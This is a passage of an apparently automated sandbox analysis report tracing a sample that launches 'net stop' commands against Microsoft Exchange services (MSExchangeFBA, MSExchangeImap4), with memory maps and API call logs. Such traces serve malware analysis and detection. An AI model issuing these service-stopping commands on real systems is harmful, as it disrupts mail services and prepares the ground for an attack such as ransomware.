= 10208 start_va = 0xb70000 end_va = 0xb73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 10209 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 10210 start_va = 0xb90000 end_va = 0xb91fff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 10211 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 10212 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 10213 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10214 start_va = 0x7f840000 end_va = 0x7f862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f840000" filename = "" Region: id = 10215 start_va = 0x7f865000 end_va = 0x7f865fff entry_point = 0x0 region_type = private name = "private_0x000000007f865000" filename = "" Region: id = 10216 start_va = 0x7f868000 end_va = 0x7f868fff entry_point = 0x0 region_type = private name = "private_0x000000007f868000" filename = "" Region: id = 10217 start_va = 0x7f86d000 end_va = 0x7f86ffff entry_point = 0x0 region_type = private name = "private_0x000000007f86d000" filename = "" Region: id = 10218 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10219 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10220 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10221 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10222 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10223 start_va = 0xd60000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 10224 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10225 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10226 start_va = 0xed0000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 10227 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10228 start_va = 0xa60000 end_va = 0xa6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 10229 start_va = 0xa70000 end_va = 0xa73fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 10230 start_va = 0xba0000 end_va = 0xc5dfff entry_point = 0xba0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10231 start_va = 0xc60000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 10232 start_va = 0xca0000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 10233 start_va = 0xd30000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 10234 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 10235 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 10236 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 10237 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 10238 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 10239 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 10240 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 10241 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 10242 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10243 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10244 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10245 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10246 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10247 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10248 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10249 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10250 start_va = 0x7f740000 end_va = 0x7f83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f740000" filename = "" Region: id = 10251 start_va = 0x7f86a000 end_va = 0x7f86cfff entry_point = 0x0 region_type = private name = "private_0x000000007f86a000" filename = "" Region: id = 10252 start_va = 0xa80000 end_va = 0xa83fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 10253 start_va = 0xd20000 end_va = 0xd22fff entry_point = 0xd20000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 10254 start_va = 0xd70000 end_va = 0xda1fff entry_point = 0xd70000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 629 os_tid = 0xefc [0136.381] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0136.381] __set_app_type (_Type=0x1) [0136.381] __p__fmode () returned 0x77ac4d6c [0136.381] __p__commode () returned 0x77ac5b1c [0136.382] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0136.382] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0136.382] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.382] GetConsoleOutputCP () returned 0x1b5 [0136.382] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0136.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.384] sprintf_s (in: _DstBuf=0xb6fe54, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0136.384] setlocale (category=0, locale=".437") returned="English_United States.437" [0136.385] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0136.385] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0136.385] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeFBA" [0136.385] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb6fbfc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0136.385] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xb6fbf0 | out: Buffer=0xb6fbf0*=0xed80f8) returned 0x0 [0136.385] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xb6fbf4 | out: Buffer=0xb6fbf4*=0xed8188) returned 0x0 [0136.385] __iob_func () returned 0x77ac1208 [0136.385] _fileno (_File=0x77ac1208) returned 0 [0136.385] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0136.385] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0136.385] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0136.386] _wcsicmp (_String1="config", _String2="stop") returned -16 [0136.386] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0136.386] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0136.386] _wcsicmp (_String1="file", _String2="stop") returned -13 [0136.386] _wcsicmp (_String1="files", _String2="stop") returned -13 [0136.386] _wcsicmp (_String1="group", _String2="stop") returned -12 [0136.386] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0136.386] _wcsicmp (_String1="help", _String2="stop") returned -11 [0136.386] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0136.386] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0136.386] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0136.386] _wcsicmp (_String1="session", _String2="stop") returned -15 [0136.386] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0136.386] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0136.386] _wcsicmp (_String1="share", _String2="stop") returned -12 [0136.386] _wcsicmp (_String1="start", _String2="stop") returned -14 [0136.386] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0136.386] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0136.386] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0136.386] _wcsicmp (_String1="accounts", _String2="MSExchangeFBA") returned -12 [0136.386] _wcsicmp (_String1="computer", _String2="MSExchangeFBA") returned -10 [0136.386] _wcsicmp (_String1="config", _String2="MSExchangeFBA") returned -10 [0136.386] _wcsicmp (_String1="continue", _String2="MSExchangeFBA") returned -10 [0136.386] _wcsicmp (_String1="cont", _String2="MSExchangeFBA") returned -10 [0136.386] _wcsicmp (_String1="file", _String2="MSExchangeFBA") returned -7 [0136.386] _wcsicmp (_String1="files", _String2="MSExchangeFBA") returned -7 [0136.386] _wcsicmp (_String1="group", _String2="MSExchangeFBA") returned -6 [0136.386] _wcsicmp (_String1="groups", _String2="MSExchangeFBA") returned -6 [0136.386] _wcsicmp (_String1="help", _String2="MSExchangeFBA") returned -5 [0136.386] _wcsicmp (_String1="helpmsg", _String2="MSExchangeFBA") returned -5 [0136.386] _wcsicmp (_String1="localgroup", _String2="MSExchangeFBA") returned -1 [0136.386] _wcsicmp (_String1="pause", _String2="MSExchangeFBA") returned 3 [0136.386] _wcsicmp (_String1="session", _String2="MSExchangeFBA") returned 6 [0136.386] _wcsicmp (_String1="sessions", _String2="MSExchangeFBA") returned 6 [0136.386] _wcsicmp (_String1="sess", _String2="MSExchangeFBA") returned 6 [0136.386] _wcsicmp (_String1="share", _String2="MSExchangeFBA") returned 6 [0136.386] _wcsicmp (_String1="start", _String2="MSExchangeFBA") returned 6 [0136.386] _wcsicmp (_String1="stats", _String2="MSExchangeFBA") returned 6 [0136.386] _wcsicmp (_String1="statistics", _String2="MSExchangeFBA") returned 6 [0136.386] _wcsicmp (_String1="stop", _String2="MSExchangeFBA") returned 6 [0136.386] _wcsicmp (_String1="time", _String2="MSExchangeFBA") returned 7 [0136.386] _wcsicmp (_String1="user", _String2="MSExchangeFBA") returned 8 [0136.386] _wcsicmp (_String1="users", _String2="MSExchangeFBA") returned 8 [0136.386] _wcsicmp (_String1="msg", _String2="MSExchangeFBA") returned 2 [0136.386] _wcsicmp (_String1="messenger", _String2="MSExchangeFBA") returned -14 [0136.386] _wcsicmp (_String1="receiver", _String2="MSExchangeFBA") returned 5 [0136.386] _wcsicmp (_String1="rcv", _String2="MSExchangeFBA") returned 5 [0136.386] _wcsicmp (_String1="netpopup", _String2="MSExchangeFBA") returned 1 [0136.386] _wcsicmp (_String1="redirector", _String2="MSExchangeFBA") returned 5 [0136.386] _wcsicmp (_String1="redir", _String2="MSExchangeFBA") returned 5 [0136.386] _wcsicmp (_String1="rdr", _String2="MSExchangeFBA") returned 5 [0136.386] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeFBA") returned 10 [0136.386] _wcsicmp (_String1="work", _String2="MSExchangeFBA") returned 10 [0136.386] _wcsicmp (_String1="wksta", _String2="MSExchangeFBA") returned 10 [0136.387] _wcsicmp (_String1="prdr", _String2="MSExchangeFBA") returned 3 [0136.387] _wcsicmp (_String1="devrdr", _String2="MSExchangeFBA") returned -9 [0136.387] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeFBA") returned -1 [0136.387] _wcsicmp (_String1="server", _String2="MSExchangeFBA") returned 6 [0136.387] _wcsicmp (_String1="svr", _String2="MSExchangeFBA") returned 6 [0136.387] _wcsicmp (_String1="srv", _String2="MSExchangeFBA") returned 6 [0136.387] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeFBA") returned -1 [0136.387] _wcsicmp (_String1="alerter", _String2="MSExchangeFBA") returned -12 [0136.387] _wcsicmp (_String1="netlogon", _String2="MSExchangeFBA") returned 1 [0136.387] _wcsupr (in: _String="MSExchangeFBA" | out: _String="MSEXCHANGEFBA") returned="MSEXCHANGEFBA" [0136.387] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xed3738 [0136.389] GetServiceKeyNameW (in: hSCManager=0xed3738, lpDisplayName="MSEXCHANGEFBA", lpServiceName=0x10a8cb0, lpcchBuffer=0xb6fb6c | out: lpServiceName="", lpcchBuffer=0xb6fb6c) returned 0 [0136.389] _wcsicmp (_String1="msg", _String2="MSEXCHANGEFBA") returned 2 [0136.389] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEFBA") returned -14 [0136.389] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEFBA") returned 5 [0136.389] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEFBA") returned 5 [0136.389] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEFBA") returned 5 [0136.389] _wcsicmp (_String1="redir", _String2="MSEXCHANGEFBA") returned 5 [0136.389] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEFBA") returned 5 [0136.389] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEFBA") returned 10 [0136.389] _wcsicmp (_String1="work", _String2="MSEXCHANGEFBA") returned 10 [0136.389] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEFBA") returned 10 [0136.389] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEFBA") returned 3 [0136.389] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEFBA") returned -9 [0136.389] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEFBA") returned -1 [0136.389] _wcsicmp (_String1="server", _String2="MSEXCHANGEFBA") returned 6 [0136.389] _wcsicmp (_String1="svr", _String2="MSEXCHANGEFBA") returned 6 [0136.389] _wcsicmp (_String1="srv", _String2="MSEXCHANGEFBA") returned 6 [0136.389] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEFBA") returned -1 [0136.389] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEFBA") returned -12 [0136.389] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEFBA") returned 1 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="WORKSTATION") returned -10 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="LanmanWorkstation") returned 1 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="SERVER") returned -6 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="LanmanServer") returned 1 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="BROWSER") returned 11 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="BROWSER") returned 11 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="MESSENGER") returned 14 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="MESSENGER") returned 14 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="NETRUN") returned -1 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="NETRUN") returned -1 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="SPOOLER") returned -6 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="SPOOLER") returned -6 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="ALERTER") returned 12 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="ALERTER") returned 12 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="NETLOGON") returned -1 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="NETLOGON") returned -1 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="NETPOPUP") returned -1 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="NETPOPUP") returned -1 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="SQLSERVER") returned -6 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="SQLSERVER") returned -6 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="REPLICATOR") returned -5 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="REPLICATOR") returned -5 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="REMOTEBOOT") returned -5 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="REMOTEBOOT") returned -5 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="TIMESOURCE") returned -7 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="TIMESOURCE") returned -7 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="AFP") returned 12 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="AFP") returned 12 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="UPS") returned -8 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="UPS") returned -8 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="XACTSRV") returned -11 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="XACTSRV") returned -11 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="TCPIP") returned -7 [0136.390] _wcsicmp (_String1="MSEXCHANGEFBA", _String2="TCPIP") returned -7 [0136.390] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xed25d8 [0136.390] OpenServiceW (hSCManager=0xed25d8, lpServiceName="MSEXCHANGEFBA", dwDesiredAccess=0x84) returned 0x0 [0136.391] GetLastError () returned 0x424 [0136.391] CloseServiceHandle (hSCObject=0xed25d8) returned 1 [0136.391] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0136.391] LoadLibraryW (lpLibFileName="NETMSG") returned 0xd20000 [0136.391] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xd20000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0136.392] GetFileType (hFile=0x40) returned 0x2 [0136.392] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb6fa08 | out: lpMode=0xb6fa08) returned 1 [0136.393] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xb6fa14, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xb6fa14*=0x1e) returned 1 [0136.393] GetFileType (hFile=0x40) returned 0x2 [0136.393] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb6fa08 | out: lpMode=0xb6fa08) returned 1 [0136.393] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xb6fa14, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xb6fa14*=0x2) returned 1 [0136.394] _ultow (in: _Dest=0x889, _Radix=11991592 | out: _Dest=0x889) returned="2185" [0136.394] FormatMessageW (in: dwFlags=0x2800, lpSource=0xd20000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0136.394] GetFileType (hFile=0x40) returned 0x2 [0136.394] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb6f9f8 | out: lpMode=0xb6f9f8) returned 1 [0136.394] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xb6fa04, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xb6fa04*=0x34) returned 1 [0136.394] GetFileType (hFile=0x40) returned 0x2 [0136.394] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb6f9f8 | out: lpMode=0xb6f9f8) returned 1 [0136.394] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xb6fa04, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xb6fa04*=0x2) returned 1 [0136.394] NetApiBufferFree (Buffer=0xed80f8) returned 0x0 [0136.394] NetApiBufferFree (Buffer=0xed8188) returned 0x0 [0136.395] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeFBA" [0136.395] exit (_Code=2) Thread: id = 630 os_tid = 0xf18 Process: id = "205" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2983f000" os_pid = "0xef8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeImap4" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10255 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 10256 start_va = 0xa00000 end_va = 0x49fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 10257 start_va = 0x4a00000 end_va = 0x4a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 10258 start_va = 0x4a20000 end_va = 0x4a20fff entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 10259 start_va = 0x4a30000 end_va = 0x4a43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a30000" filename = "" Region: id = 10260 start_va = 0x4a50000 end_va = 0x4a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a50000" filename = "" Region: id = 10261 start_va = 0x4a90000 end_va = 0x4b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a90000" filename = "" Region: id = 10262 start_va = 0x4b90000 end_va = 0x4b93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b90000" filename = "" Region: id = 10263 start_va = 0x4ba0000 end_va = 0x4ba0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ba0000" filename = "" Region: id = 10264 start_va = 0x4bb0000 end_va = 0x4bb1fff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 10265 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10266 start_va = 0x7e740000 end_va = 0x7e762fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e740000" filename = "" Region: id = 10267 start_va = 0x7e76a000 end_va = 0x7e76cfff entry_point = 0x0 region_type = private name = "private_0x000000007e76a000" filename = "" Region: id = 10268 start_va = 0x7e76d000 end_va = 0x7e76dfff entry_point = 0x0 region_type = private name = "private_0x000000007e76d000" filename = "" Region: id = 10269 start_va = 0x7e76f000 end_va = 0x7e76ffff entry_point = 0x0 region_type = private name = "private_0x000000007e76f000" filename = "" Region: id = 10270 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10271 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10272 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10273 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10274 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10275 start_va = 0x4c00000 end_va = 0x4c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 10276 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10277 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10278 start_va = 0x4d10000 end_va = 0x4e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d10000" filename = "" Region: id = 10279 start_va = 